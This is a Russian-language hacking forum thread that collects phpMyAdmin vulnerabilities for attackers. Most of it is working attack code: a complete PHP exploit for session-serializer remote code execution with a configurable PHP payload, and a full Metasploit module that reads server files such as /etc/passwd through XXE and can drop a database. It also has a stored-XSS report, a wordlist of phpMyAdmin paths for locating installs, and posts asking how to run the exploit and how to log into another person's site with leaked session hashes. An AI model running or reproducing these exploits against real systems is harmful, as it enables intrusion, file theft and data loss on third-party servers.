[ Обзор уязвимостей phpMyAdmin ]

Discussion in 'Веб-уязвимости' started by ettee, 7 Oct 2007.

  1. KIR@PRO

    KIR@PRO Active Member

    Joined:
    26 Dec 2007
    Messages:
    824
    Likes Received:
    289
    Reputations:
    352
    раскрытие путей в 3.* версиях

    Проверялось на версии 3.2.0.1
    XSS то они походу заделали, но как всегда получили что то другое, в нашем случае раскрытие путей ;)
     
    _________________________
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,752
    Likes Received:
    1,044
    Reputations:
    339
    http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
     
    1 person likes this.
  3. абвгдешка

    Joined:
    2 May 2011
    Messages:
    63
    Likes Received:
    13
    Reputations:
    1
    phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP code execution exploit

    PHP:
       <?php
    /*
    phpMyAdmin < 3.3.10.2 & < 3.4.3.1 Session Serializer arbitrary PHP code execution exploit
    by M4g, ICQ 884888, http://snipper.ru, (c) 2011
    ---
    PHP depending and settings on the target PMA installation: magic_quotes_gpc = off, PHP <= 5.2.13 & PHP <= 5.3.2
    ---
    Links & Thanks:
    0. http://snipper.ru/view/103/phpmyadmin-33102-3431-session-serializer-arbitrary-php-code-execution-exploit/
    1. http://php-security.org/2010/05/31/mops-2010-060-php-session-serializer-session-data-injection-vulnerability/index.html
    2. https://rdot.org/forum/showthread.php?t=286
    3. http://ha.xxor.se/2011/07/phpmyadmin-3x-multiple-remote-code.html
    4. http://snipper.ru/view/12/phpmyadmin-2119-unserialize-arbitrary-php-code-execution-exploit/
    */

    /*Settings*/
    $pmaurl 'http://lamer/phpmyadmin325/'//full PMA url 
    $payload '<?php phpinfo(); ?>'//PHP code to execute
    /*Settings*/

    /*-------------------------------------------EXPLOIT CODE-------------------------------------------*/

    $count_redirects 0;
    $max_redirects 5;

    //отправляем http-данные
    //$method = POST|GET, $url = http://site.com/path, $data = foo1=bar1&foo2=bar2, referer, cookie, useragent, other headers, timeout, what to show = (0-all, 1-body, 2-headers), redirect = 0|1
    function send_data($method$url$data ''$referer_string ''$cookie_string ''$ua_string 'Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8'$other_headers''$timeout 30$show 0$follow_redirect=0)
        {
        global 
    $count_redirects,$max_redirects;
        
    $return '';
        
    $feof_count 0;

        
    $parsed_url parse_url($url);
        
    $site $parsed_url['host'];
        
    $path $parsed_url['path'];
        
    $query $parsed_url['query'];

        if(
    preg_match('@_$@i',$query) && !preg_match('@_$@i',$url))
            
    $query rtrim($query,'_');

        if(
    preg_match('@_$@i',$path) && !preg_match('@_$@i',$url))
            
    $path rtrim($path,'_');

        (
    $method == 'GET' && !empty($data)) ? $path .= '?'.$data '';
        (
    $method == 'GET' && !empty($query) && empty($data)) ? $path .= '?'.$query '';
        (
    $method == 'POST' && !empty($query)) ? $path .= '?'.$query '';
     
        if(
    $fp fsockopen($site80$errno$errstr$timeout))
            {
            (
    $method == 'POST') ? $out "POST $path HTTP/1.1\r\n" $out "GET $path HTTP/1.1\r\n";
               
    $out .= "Host: $site\r\n";
              
    $out .= "Content-type: application/x-www-form-urlencoded\r\n";
                 
    $out .= "Connection: Close\r\n";
               
    $out .= "User-Agent: $ua_string\r\n";
               !empty(
    $referer_string) ? $out .= "Referer: $referer_string\r\n" '';
               !empty(
    $cookie_string) ? $out .= "Cookie: $cookie_string\r\n" '';
            !empty(
    $other_headers) ? $out .= $other_headers '';
            (
    $method == 'POST') ? $out .= "Content-Length: ".strlen($data)."\r\n\r\n" $out .= "\r\n";
            (
    $method == 'POST') ? fwrite($fp$out.$data) : fwrite($fp$out);

            while (!
    feof($fp)) 
                {
                if(
    $feof_count >=10000)
                    break;
     
                
    $return .= fread($fp4800);
                ++
    $feof_count;
                }

            
    fclose($fp);

            if(
    $follow_redirect)
                {
                if(
    $count_redirects<$max_redirects)
                    {
                    if(
    preg_match('@Location: (.+)@i',$return,$redirect_match))
                        {
                        
    $count_redirects++;
                        
    $return send_data($method$redirect_match[1], $data$referer_string$cookie_string$ua_string$other_headers$timeout$show$follow_redirect);
                        
    $count_redirects 0;
                        }
                    }
                else
                    return 
    'Max redirects = '.$max_redirects;
                }

            if(
    $show == 1)
                {
                
    $return explode("\r\n\r\n",$return);
                
    $return $return[1];
                }
            elseif(
    $show == 2)
                {
                
    $return explode("\r\n\r\n",$return);
                
    $return $return[0];
                }

            return 
    $return;
            }
        else
            return array(
    'errno' => $errno'errstr' => $errstr);
            }

    $pmaurl rtrim($pmaurl,'/').'/index.php';

    //Regards to asddas
    $sess_path = array('/tmp/'
                       
    '/var/tmp/'
                       
    '/var/lib/php/'
                       
    '/var/lib/php4/'
                       
    '/var/lib/php5/'
                       
    '/var/lib/php/session/'
                       
    '/var/lib/php4/session/'
                       
    '/var/lib/php5/session/'
                       
    '/shared/sessions'
                       
    '/var/php_sessions/'
                       
    '/var/sessions/'
                       
    '/tmp/php_sessions/'
                       
    '/tmp/sessions/'
                       
    '../../../tmp/'
                       
    '../../../../tmp/',                                     
                       
    '../../../../../tmp/'
                       
    '../../../../../../tmp/'
                       
    '../../../../../../../tmp/'
                       
    '../../../temp/'
                       
    '../../../../temp/'
                       
    '../../../../../temp/'
                       
    '../../../../../../temp/'
                       
    '../../../../../../../temp/'
                       
    '../../../sessions/'
                       
    '../../../../sessions/'
                       
    '../../../../../sessions/'
                       
    '../../../../../../sessions/'
                       
    '../../../../../../../sessions/'
                       
    '../../../phptmp/'
                       
    '../../../../phptmp/'
                       
    '../../../../../phptmp/'
                       
    '../../../../../../phptmp/'
                       
    '../../../../../../../phptmp/');

    //1. Token, Session name and Cookies
    $token_page send_data('GET',$pmaurl);

    preg_match('@name="token" value="([a-f0-9]{32})"@is',$token_page,$token_array);
     
    $token $token_array[1];
     
    preg_match_all('@Set-Cookie: ([^\r\n;]+)@is',$token_page,$cookie_array);
     
    $cookie_array $cookie_array[1];
    $cookie_array implode("; ",$cookie_array);

    preg_match('@phpMyAdmin=([a-z0-9]{32,40});?@is',$token_page,$session_array);

    $session $session_array[1];

    //2. Inject into session testing

    $sess_test_page '';
    $o 0;
    $good_inj false;

    do
        {
        
    $inj $sess_path[$o].'sess_'.$session;
        
    $query $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($inj).':"'.$inj.'";}}');
        
    $sess_test_page send_data('GET',$query,'',$pmaurl,$cookie_array);
        
    $sess_test_page2 send_data('GET',$pmaurl.'?token='.$token,'',$pmaurl,$cookie_array);

        if(
    stristr($sess_test_page2,'PMA_Config'))
            {
            
    $good_inj $inj;
            
    flush();
            print 
    '[+] '.$inj.' - good path<br/>';
            break;
            }
        else
            {
            
    flush();
            print 
    '[-] '.$inj.' - bad path<br/>';
            }
        
    $o++;
        }
    while(
    $o count($sess_path));

    if(
    $good_inj)
        {
        
    $query $pmaurl.'?session_to_unset=123&token='.$token.'&_SESSION[!bla]='.urlencode('|xxx|a:1:{i:0;O:10:"PMA_Config":1:{s:6:"source";s:'.strlen($good_inj).':"'.$good_inj.'";}}').'&_SESSION[payload]='.urlencode($payload);
        
    $sess_test_page send_data('GET',$query,'',$pmaurl,$cookie_array);
        
    $sess_test_page2 send_data('GET',$pmaurl.'?token='.$token,'',$pmaurl,$cookie_array);
        
        print 
    $sess_test_page2;
        }
    else
        die(
    '[+] Session path was not found');
     
    #23 абвгдешка, 12 Jul 2011
    Last edited: 14 Jul 2011
    3 people like this.
  4. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection
    Code:
    require 'msf/core'
     
    class Metasploit3 < Msf::Auxiliary
     
        include Msf::Exploit::Remote::HttpClient
     
        def initialize
            super(
                'Name'        => 'phpMyAdmin 3.3.X and 3.4.X - Local File Inclusion via XXE Injection',
                'Version'     => '1.0',
                'Description' => %q{Importing a specially-crafted XML file which contains an XML entity injection permits to retrieve a local file (limited by the privileges of the user running the web server).
                The attacker must be logged in to MySQL via phpMyAdmin.
                Works on Windows and Linux Versions 3.3.X and 3.4.X},
                'References'  =>
                    [
                        [ 'CVE', '2011-4107' ],
                                            [ 'OSVDB', '76798' ],
                                            [ 'BID', '50497' ],
                                            [ 'URL', 'http://secforce.com/research/'],
                    ],
                'Author'      => [ 'Marco Batista' ],
                'License'     => MSF_LICENSE
                )
     
            register_options(
                [
                    Opt::RPORT(80),
                    OptString.new('FILE', [ true,  "File to read", '/etc/passwd']),
                    OptString.new('USER', [ true,  "Username", 'root']),
                    OptString.new('PASS', [ false,  "Password", 'password']),
                    OptString.new('DB', [ true,  "Database to use/create", 'hddaccess']),
                    OptString.new('TBL', [ true,  "Table to use/create and read the file to", 'files']),
                    OptString.new('APP', [ true,  "Location for phpMyAdmin URL", '/phpmyadmin']),
                    OptString.new('DROP', [ true,  "Drop database after reading file?", 'true']),
                ],self.class)
        end
     
        def loginprocess
            # HTTP GET TO GET SESSION VALUES
            getresponse = send_request_cgi({
                'uri'     => datastore['APP']+'/index.php',
                'method'  => 'GET',
                'version' => '1.1',
                }, 25)
     
            if (getresponse.nil?)
                print_error("no response for #{ip}:#{rport}")
            elsif (getresponse.code == 200)
                print_status("Received #{getresponse.code} from #{rhost}:#{rport}")
            elsif (getresponse and getresponse.code == 302 or getresponse.code == 301)
                print_status("Received 302 to #{getresponse.headers['Location']}")
            else
                print_error("Received #{getresponse.code} from #{rhost}:#{rport}")
            end
     
            valuesget = getresponse.headers["Set-Cookie"]
            varsget = valuesget.split(" ")
     
            #GETTING THE VARIABLES NEEDED
            phpMyAdmin = varsget.grep(/phpMyAdmin/).last
            pma_mcrypt_iv = varsget.grep(/pma_mcrypt_iv/).last
            # END HTTP GET
     
            # LOGIN POST REQUEST TO GET COOKIE VALUE
            postresponse = send_request_cgi({
                'uri'     => datastore['APP']+'/index.php',
                'method'  => 'POST',
                'version' => '1.1',
                'headers' =>{
                        'Content-Type' => 'application/x-www-form-urlencoded',
                        'Cookie' => "#{pma_mcrypt_iv} #{phpMyAdmin}"
                                },
                'data'    => 'pma_username='+datastore['USER']+'&pma_password='+datastore['PASS']+'&server=1'
                }, 25)     
     
            if (postresponse["Location"].nil?)
                print_status("TESTING#{postresponse.body.split("'").grep(/token/).first.split("=").last}")
                tokenvalue = postresponse.body.split("'").grep(/token/).first.split("=").last          
            else
                tokenvalue = postresponse["Location"].split("&").grep(/token/).last.split("=").last
            end
             
             
            valuespost = postresponse.headers["Set-Cookie"]
            varspost = valuespost.split(" ")
             
            #GETTING THE VARIABLES NEEDED
            pmaUser = varspost.grep(/pmaUser-1/).last
            pmaPass = varspost.grep(/pmaPass-1/).last
     
            return "#{pma_mcrypt_iv} #{phpMyAdmin} #{pmaUser} #{pmaPass}",tokenvalue
            # END OF LOGIN POST REQUEST
            rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, Rex::ConnectionError =>e
                print_error(e.message)
            rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
                print_error(e.message)
        end
     
        def readfile(cookie,tokenvalue)
            #READFILE TROUGH EXPORT FUNCTION IN PHPMYADMIN
            getfiles = send_request_cgi({
                'uri'     => datastore['APP']+'/export.php',
                'method'  => 'POST',
                'version' => '1.1',
                'headers' =>{
                        'Cookie' => cookie
                            },
                'data'    => 'db='+datastore['DB']+'&table='+datastore['TBL']+'&token='+tokenvalue+'&single_table=TRUE&export_type=table&sql_query=SELECT+*+FROM+%60files%60&what=texytext&texytext_structure=something&texytext_data=something&texytext_null=NULL&asfile=sendit&allrows=1&codegen_structure_or_data=data&texytext_structure_or_data=structure_and_data&yaml_structure_or_data=data'
                }, 25)
             
            if (getfiles.body.split("\n").grep(/== Dumping data for table/).empty?)
                print_error("Error reading the file... not enough privilege? login error?")        
            else
                print_status("#{getfiles.body}")
            end
        end
     
     
        def dropdatabase(cookie,tokenvalue)
            dropdb = send_request_cgi({
                'uri'     => datastore['APP']+'/sql.php?sql_query=DROP+DATABASE+%60'+datastore['DB']+'%60&back=db_operations.php&goto=main.php&purge=1&token='+tokenvalue+'&is_js_confirmed=1&ajax_request=false',
                'method'  => 'GET',
                'version' => '1.1',
                'headers' =>{
                        'Cookie' => cookie
                            },
                }, 25)
     
                print_status("Dropping database: "+datastore['DB'])
        end
     
        def run
            cookie,tokenvalue = loginprocess()
         
            print_status("Login at #{datastore['RHOST']}:#{datastore['RPORT']}#{datastore['APP']} using #{datastore['USER']}:#{datastore['PASS']}")
         
            craftedXML =  "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"token\"\n\n"
            craftedXML << tokenvalue+"\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"import_type\"\n\n"
            craftedXML << "server\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"import_file\"; filename=\"exploit.xml\"\n"
            craftedXML << "Content-Type: text/xml\n\n"
            craftedXML << "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n"
            craftedXML << "<!DOCTYPE ficheiro [  \n"
            craftedXML << "  <!ENTITY conteudo SYSTEM \"file:///#{datastore['FILE']}\" >]>\n"
            craftedXML << "<pma_xml_export version=\"1.0\" xmlns:pma=\"http://www.phpmyadmin.net/some_doc_url/\">\n"
            craftedXML << "    <pma:structure_schemas>\n"
            craftedXML << "        <pma:database name=\""+datastore['DB']+"\" collation=\"utf8_general_ci\" charset=\"utf8\">\n"
            craftedXML << "            <pma:table name=\""+datastore['TBL']+"\">\n"
            craftedXML << "                CREATE TABLE `"+datastore['TBL']+"` (`file` varchar(20000) NOT NULL);\n"
            craftedXML << "            </pma:table>\n"
            craftedXML << "        </pma:database>\n"
            craftedXML << "    </pma:structure_schemas>\n"
            craftedXML << "    <database name=\""+datastore['DB']+"\">\n"
            craftedXML << "        <table name=\""+datastore['TBL']+"\">\n"
            craftedXML << "            <column name=\"file\">&conteudo;</column>\n"
            craftedXML << "        </table>\n"
            craftedXML << "    </database>\n"
            craftedXML << "</pma_xml_export>\n\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"format\"\n\n"
            craftedXML << "xml\n"
            craftedXML << "------WebKitFormBoundary3XPL01T\n"
            craftedXML << "Content-Disposition: form-data; name=\"csv_terminated\"\n\n"
            craftedXML << ",\n\n"
            craftedXML << "------WebKitFormBoundary3XPL01T--"
             
         
            print_status("Grabbing that #{datastore['FILE']} you want...")
            res = send_request_cgi({
                'uri'     => datastore['APP']+'/import.php',
                'method'  => 'POST',
                'version' => '1.1',
                'headers' =>{
                        'Content-Type' => 'multipart/form-data; boundary=----WebKitFormBoundary3XPL01T',
                        'Cookie' => cookie
                            },
                'data'    => craftedXML
            }, 25)
     
            readfile(cookie,tokenvalue)
     
            if (datastore['DROP'] == "true")
                dropdatabase(cookie,tokenvalue)
            else
                print_status("Database was not dropped: "+datastore['DB'])         
            end
     
        end
    end
    http://1337day.com/exploits/17376


    P.S. Date: 12-01-2012 ;)
     
  5. Strikerus

    Strikerus New Member

    Joined:
    8 Jun 2009
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    Часто мануалы не удаляют, а зря. Можно и так версию определить ;)
    .../phpmyadmin/Documentation.html
     
    #25 Strikerus, 15 Apr 2012
    Last edited: 15 Apr 2012
  6. dynda2000

    dynda2000 New Member

    Joined:
    16 Mar 2012
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Объясни плиз как и чем запускать этот сплоит?
     
  7. ex'pert

    ex'pert New Member

    Joined:
    28 May 2011
    Messages:
    62
    Likes Received:
    3
    Reputations:
    -3
    Ребят, подскажите что можно сделать с этим
    Code:
    <a title="Все статьи" href="site.com/articles/?phpMyAdmin=c08d2be2e14cc3df4f21ae0b8cc7dc6a&phpMyAdmin=e82e404ad3bd12018999ec4ba6d1ab98">go all materials</a>
    НА одном из сайтов админ видимо случайно оставил такую ссылку. Что в этих хешах?
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,787
    Likes Received:
    808
    Reputations:
    856
    Да вроде ничего существенного, два мд5 хэша (если не ошибаюсь).
     
    _________________________
  9. ex'pert

    ex'pert New Member

    Joined:
    28 May 2011
    Messages:
    62
    Likes Received:
    3
    Reputations:
    -3
    Ну я не пойму почему их 2. Может в одном из них пароль к пхпадмину? я знаю адрес входа и логин того узера. Неплохо было бы расшифровать хеши и только знать бы пароль ли в них?
    либо авторизоваться как то с помощью 'этих хешей либо кук
     
  10. MrCepbIu

    MrCepbIu Banned

    Joined:
    24 Feb 2010
    Messages:
    68
    Likes Received:
    3
    Reputations:
    1
    что подставить в $sess_path под вин?
     
    #30 MrCepbIu, 13 Sep 2012
    Last edited: 13 Sep 2012
  11. FlooP1k

    FlooP1k Banned

    Joined:
    28 Jul 2010
    Messages:
    161
    Likes Received:
    66
    Reputations:
    48
    Есть ли еще способы узнать полный путь в phpMyAdmin? Просто все способы указанные в первом посте очень стары и не актуальны ( Хотя бы если есть полные права пользователя?
     
  12. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    175
    Likes Received:
    100
    Reputations:
    32
    phpmyadmin активная XSS

    тест;phpMyAdmin 3.4.*
    скрипт; /setup/index.php
    путь;index.php?page=servers&mode=edit&id=1
    уязвимое поле ;Server hostname;


    [​IMG]


    нашел только что , не проверял есть ли в интернете.
     
    Filipp likes this.
  13. zuzzz

    zuzzz Member

    Joined:
    3 Jul 2009
    Messages:
    38
    Likes Received:
    8
    Reputations:
    1
    Недавно делал себе словарик для поиска. Может кому пригодится.
    Code:
    /_phpMyAdmin/
    /admin/
    /admin/mysql/
    /admin/phpmyadmin/
    /admin/pma/
    /db/
    /dbadmin/
    /myadmin/
    /mysql-admin/
    /mysql/
    /mysqladmin/
    /mysqlmanager/
    /p/m/a/
    /php-my-admin/
    /php-myadmin/
    /phpm/
    /phpmanager/
    /phpmy-admin/
    /phpmy/
    /phpMyA/
    /phpmyad-sys/
    /phpmyad/
    /phpMyAdmin/
    /phpMyAdmin-1.1.0/
    /phpMyAdmin-1.3.0/
    /phpMyAdmin-2.0.5/
    /phpMyAdmin-2.1.0/
    /phpMyAdmin-2.10.0-rc1/
    /phpMyAdmin-2.10.0.1/
    /phpMyAdmin-2.10.0.2/
    /phpMyAdmin-2.10.0/
    /phpMyAdmin-2.10.1-rc1/
    /phpMyAdmin-2.10.1/
    /phpMyAdmin-2.10.2/
    /phpMyAdmin-2.10.3-rc1/
    /phpMyAdmin-2.10.3/
    /phpMyAdmin-2.11.0-rc2/
    /phpMyAdmin-2.11.0/
    /phpMyAdmin-2.11.1-rc1/
    /phpMyAdmin-2.11.1.1/
    /phpMyAdmin-2.11.1.2/
    /phpMyAdmin-2.11.1/
    /phpMyAdmin-2.11.10.1/
    /phpMyAdmin-2.11.10/
    /phpMyAdmin-2.11.11-rc1/
    /phpMyAdmin-2.11.11.1/
    /phpMyAdmin-2.11.11.2/
    /phpMyAdmin-2.11.11.3/
    /phpMyAdmin-2.11.11/
    /phpMyAdmin-2.11.2-rc1/
    /phpMyAdmin-2.11.2.1/
    /phpMyAdmin-2.11.2.2/
    /phpMyAdmin-2.11.2/
    /phpMyAdmin-2.11.3-rc1/
    /phpMyAdmin-2.11.3/
    /phpMyAdmin-2.11.4-rc1/
    /phpMyAdmin-2.11.4/
    /phpMyAdmin-2.11.5-rc1/
    /phpMyAdmin-2.11.5.1/
    /phpMyAdmin-2.11.5.2/
    /phpMyAdmin-2.11.5/
    /phpMyAdmin-2.11.6-rc1/
    /phpMyAdmin-2.11.6/
    /phpMyAdmin-2.11.7-rc1/
    /phpMyAdmin-2.11.7-rc2/
    /phpMyAdmin-2.11.7.1/
    /phpMyAdmin-2.11.7/
    /phpMyAdmin-2.11.8-rc1/
    /phpMyAdmin-2.11.8.1/
    /phpMyAdmin-2.11.8/
    /phpMyAdmin-2.11.9.1/
    /phpMyAdmin-2.11.9.2/
    /phpMyAdmin-2.11.9.3/
    /phpMyAdmin-2.11.9.4/
    /phpMyAdmin-2.11.9.5/
    /phpMyAdmin-2.11.9.6/
    /phpMyAdmin-2.11.9/
    /phpMyAdmin-2.2.0/
    /phpMyAdmin-2.2.1/
    /phpMyAdmin-2.2.2/
    /phpMyAdmin-2.2.3/
    /phpMyAdmin-2.2.4/
    /phpMyAdmin-2.2.5/
    /phpMyAdmin-2.2.6/
    /phpMyAdmin-2.2.7-pl1/
    /phpMyAdmin-2.3.0/
    /phpMyAdmin-2.3.1/
    /phpMyAdmin-2.3.2/
    /phpMyAdmin-2.3.3-pl1/
    /phpMyAdmin-2.4.0/
    /phpMyAdmin-2.5.0/
    /phpMyAdmin-2.5.1/
    /phpMyAdmin-2.5.2/
    /phpMyAdmin-2.5.4/
    /phpMyAdmin-2.5.5-pl1/
    /phpMyAdmin-2.5.5-rc1/
    /phpMyAdmin-2.5.5-rc2/
    /phpMyAdmin-2.5.6-rc1/
    /phpMyAdmin-2.5.6-rc2/
    /phpMyAdmin-2.5.6/
    /phpMyAdmin-2.5.7-pl1/
    /phpMyAdmin-2.6.0-alpha/
    /phpMyAdmin-2.6.0-alpha2/
    /phpMyAdmin-2.6.0-beta1/
    /phpMyAdmin-2.6.0-beta2/
    /phpMyAdmin-2.6.0-pl1/
    /phpMyAdmin-2.6.0-pl2/
    /phpMyAdmin-2.6.0-pl3/
    /phpMyAdmin-2.6.0-rc1/
    /phpMyAdmin-2.6.0-rc2/
    /phpMyAdmin-2.6.0-rc3/
    /phpMyAdmin-2.6.0/
    /phpMyAdmin-2.6.1-pl1/
    /phpMyAdmin-2.6.1-pl2/
    /phpMyAdmin-2.6.1-pl3/
    /phpMyAdmin-2.6.1-rc1/
    /phpMyAdmin-2.6.1-rc2/
    /phpMyAdmin-2.6.1/
    /phpMyAdmin-2.6.2-beta1/
    /phpMyAdmin-2.6.2-pl1/
    /phpMyAdmin-2.6.2-rc1/
    /phpMyAdmin-2.6.3-pl1/
    /phpMyAdmin-2.6.3-rc1/
    /phpMyAdmin-2.6.3/
    /phpMyAdmin-2.6.4-pl1/
    /phpMyAdmin-2.6.4-pl2/
    /phpMyAdmin-2.6.4-pl3/
    /phpMyAdmin-2.6.4-pl4/
    /phpMyAdmin-2.6.4-rc1/
    /phpMyAdmin-2.7.0-beta1/
    /phpMyAdmin-2.7.0-pl1/
    /phpMyAdmin-2.7.0-pl2/
    /phpMyAdmin-2.7.0-rc1/
    /phpMyAdmin-2.8.0-beta1/
    /phpMyAdmin-2.8.0-rc1/
    /phpMyAdmin-2.8.0-rc2/
    /phpMyAdmin-2.8.0.1/
    /phpMyAdmin-2.8.0.2/
    /phpMyAdmin-2.8.0.3/
    /phpMyAdmin-2.8.0.4/
    /phpMyAdmin-2.8.0/
    /phpMyAdmin-2.8.1-rc1/
    /phpMyAdmin-2.8.1/
    /phpMyAdmin-2.8.2.4/
    /phpMyAdmin-2.9.0.1/
    /phpMyAdmin-2.9.0.2/
    /phpMyAdmin-2.9.0/
    /phpMyAdmin-2.9.1.1/
    /phpMyAdmin-2.9.2-rc1/
    /phpMyAdmin-2.9.2/
    /phpMyAdmin-2/
    /phpMyAdmin-3.0.0-alpha/
    /phpMyAdmin-3.0.0-rc2/
    /phpMyAdmin-3.0.0/
    /phpMyAdmin-3.0.1-rc1/
    /phpMyAdmin-3.0.1.1/
    /phpMyAdmin-3.0.1/
    /phpMyAdmin-3.1.0-beta1/
    /phpMyAdmin-3.1.0-rc1/
    /phpMyAdmin-3.1.0/
    /phpMyAdmin-3.1.1/
    /phpMyAdmin-3.1.2-rc1/
    /phpMyAdmin-3.1.2/
    /phpMyAdmin-3.1.3-rc1/
    /phpMyAdmin-3.1.3.1/
    /phpMyAdmin-3.1.3.2/
    /phpMyAdmin-3.1.3/
    /phpMyAdmin-3.1.4-rc1/
    /phpMyAdmin-3.1.4-rc2/
    /phpMyAdmin-3.1.4/
    /phpMyAdmin-3.1.5-rc1/
    /phpMyAdmin-3.1.5/
    /phpMyAdmin-3.2.0-beta1/
    /phpMyAdmin-3.2.0-rc1/
    /phpMyAdmin-3.2.0.1/
    /phpMyAdmin-3.2.0/
    /phpMyAdmin-3.2.1/
    /phpMyAdmin-3.2.2-rc1/
    /phpMyAdmin-3.2.2.1/
    /phpMyAdmin-3.2.2/
    /phpMyAdmin-3.2.3-rc1/
    /phpMyAdmin-3.2.3/
    /phpMyAdmin-3.2.4-rc1/
    /phpMyAdmin-3.2.4/
    /phpMyAdmin-3.2.5-rc1/
    /phpMyAdmin-3.2.5-rc2/
    /phpMyAdmin-3.2.5/
    /phpMyAdmin-3.3.0-alpha1/
    /phpMyAdmin-3.3.0-beta1/
    /phpMyAdmin-3.3.0-rc1/
    /phpMyAdmin-3.3.0-rc2/
    /phpMyAdmin-3.3.0-rc3/
    /phpMyAdmin-3.3.0/
    /phpMyAdmin-3.3.1-rc1/
    /phpMyAdmin-3.3.1/
    /phpMyAdmin-3.3.10-rc1/
    /phpMyAdmin-3.3.10.1/
    /phpMyAdmin-3.3.10.2/
    /phpMyAdmin-3.3.10.3/
    /phpMyAdmin-3.3.10.4/
    /phpMyAdmin-3.3.10.5/
    /phpMyAdmin-3.3.10/
    /phpMyAdmin-3.3.2-rc1/
    /phpMyAdmin-3.3.2/
    /phpMyAdmin-3.3.3-rc1/
    /phpMyAdmin-3.3.3/
    /phpMyAdmin-3.3.4-rc1/
    /phpMyAdmin-3.3.4/
    /phpMyAdmin-3.3.5-rc1/
    /phpMyAdmin-3.3.5.1/
    /phpMyAdmin-3.3.5/
    /phpMyAdmin-3.3.6-rc1/
    /phpMyAdmin-3.3.6/
    /phpMyAdmin-3.3.7-7/
    /phpMyAdmin-3.3.7-rc1/
    /phpMyAdmin-3.3.7/
    /phpMyAdmin-3.3.8-rc1/
    /phpMyAdmin-3.3.8.1/
    /phpMyAdmin-3.3.8/
    /phpMyAdmin-3.3.9-rc1/
    /phpMyAdmin-3.3.9.1/
    /phpMyAdmin-3.3.9.2/
    /phpMyAdmin-3.3.9/
    /phpMyAdmin-3.4.0-alpha1/
    /phpMyAdmin-3.4.0-alpha2/
    /phpMyAdmin-3.4.0-beta1/
    /phpMyAdmin-3.4.0-beta2/
    /phpMyAdmin-3.4.0-beta3/
    /phpMyAdmin-3.4.0-beta4/
    /phpMyAdmin-3.4.0-rc1/
    /phpMyAdmin-3.4.0-rc2/
    /phpMyAdmin-3.4.0/
    /phpMyAdmin-3.4.1-rc1/
    /phpMyAdmin-3.4.1/
    /phpMyAdmin-3.4.10-rc1/
    /phpMyAdmin-3.4.10.1/
    /phpMyAdmin-3.4.10.2/
    /phpMyAdmin-3.4.10/
    /phpMyAdmin-3.4.11-rc1/
    /phpMyAdmin-3.4.11.1/
    /phpMyAdmin-3.4.11/
    /phpMyAdmin-3.4.2-rc1/
    /phpMyAdmin-3.4.2/
    /phpMyAdmin-3.4.3-rc1/
    /phpMyAdmin-3.4.3.1/
    /phpMyAdmin-3.4.3.2/
    /phpMyAdmin-3.4.3/
    /phpMyAdmin-3.4.4-rc1/
    /phpMyAdmin-3.4.4/
    /phpMyAdmin-3.4.5-rc1/
    /phpMyAdmin-3.4.5/
    /phpMyAdmin-3.4.6-rc1/
    /phpMyAdmin-3.4.6/
    /phpMyAdmin-3.4.7-rc1/
    /phpMyAdmin-3.4.7.1/
    /phpMyAdmin-3.4.7/
    /phpMyAdmin-3.4.8-rc1/
    /phpMyAdmin-3.4.8/
    /phpMyAdmin-3.4.9-rc1/
    /phpMyAdmin-3.4.9/
    /phpMyAdmin-3.5.0-alpha1/
    /phpMyAdmin-3.5.0-beta1/
    /phpMyAdmin-3.5.0-rc1/
    /phpMyAdmin-3.5.0-rc2/
    /phpMyAdmin-3.5.0/
    /phpMyAdmin-3.5.1-rc1/
    /phpMyAdmin-3.5.1/
    /phpMyAdmin-3.5.2-rc1/
    /phpMyAdmin-3.5.2.1/
    /phpMyAdmin-3.5.2.2/
    /phpMyAdmin-3.5.2/
    /phpMyAdmin-3.5.3-rc1/
    /phpMyAdmin-3.5.3/
    /phpMyAdmin-3.5.4-rc1/
    /phpMyAdmin-3.5.4/
    /phpMyAdmin-3.5.5-rc1/
    /phpMyAdmin-3.5.5/
    /phpMyAdmin-3.5.6-rc1/
    /phpMyAdmin-3.5.6/
    /phpMyAdmin-3.5.7-rc1/
    /phpMyAdmin-3.5.7/
    /phpMyAdmin-3.5.8-rc1/
    /phpMyAdmin-3.5.8.1/
    /phpMyAdmin-3.5.8.2/
    /phpMyAdmin-3.5.8/
    /phpMyAdmin-3/
    /phpMyAdmin-4.0.0-alpha1/
    /phpMyAdmin-4.0.0-alpha2/
    /phpMyAdmin-4.0.0-beta1/
    /phpMyAdmin-4.0.0-beta2/
    /phpMyAdmin-4.0.0-rc2/
    /phpMyAdmin-4.0.0-rc3/
    /phpMyAdmin-4.0.0-rc4/
    /phpMyAdmin-4.0.0/
    /phpMyAdmin-4.0.1-rc1/
    /phpMyAdmin-4.0.1/
    /phpMyAdmin-4.0.10.1/
    /phpMyAdmin-4.0.10.2/
    /phpMyAdmin-4.0.10.3/
    /phpMyAdmin-4.0.10.4/
    /phpMyAdmin-4.0.10.5/
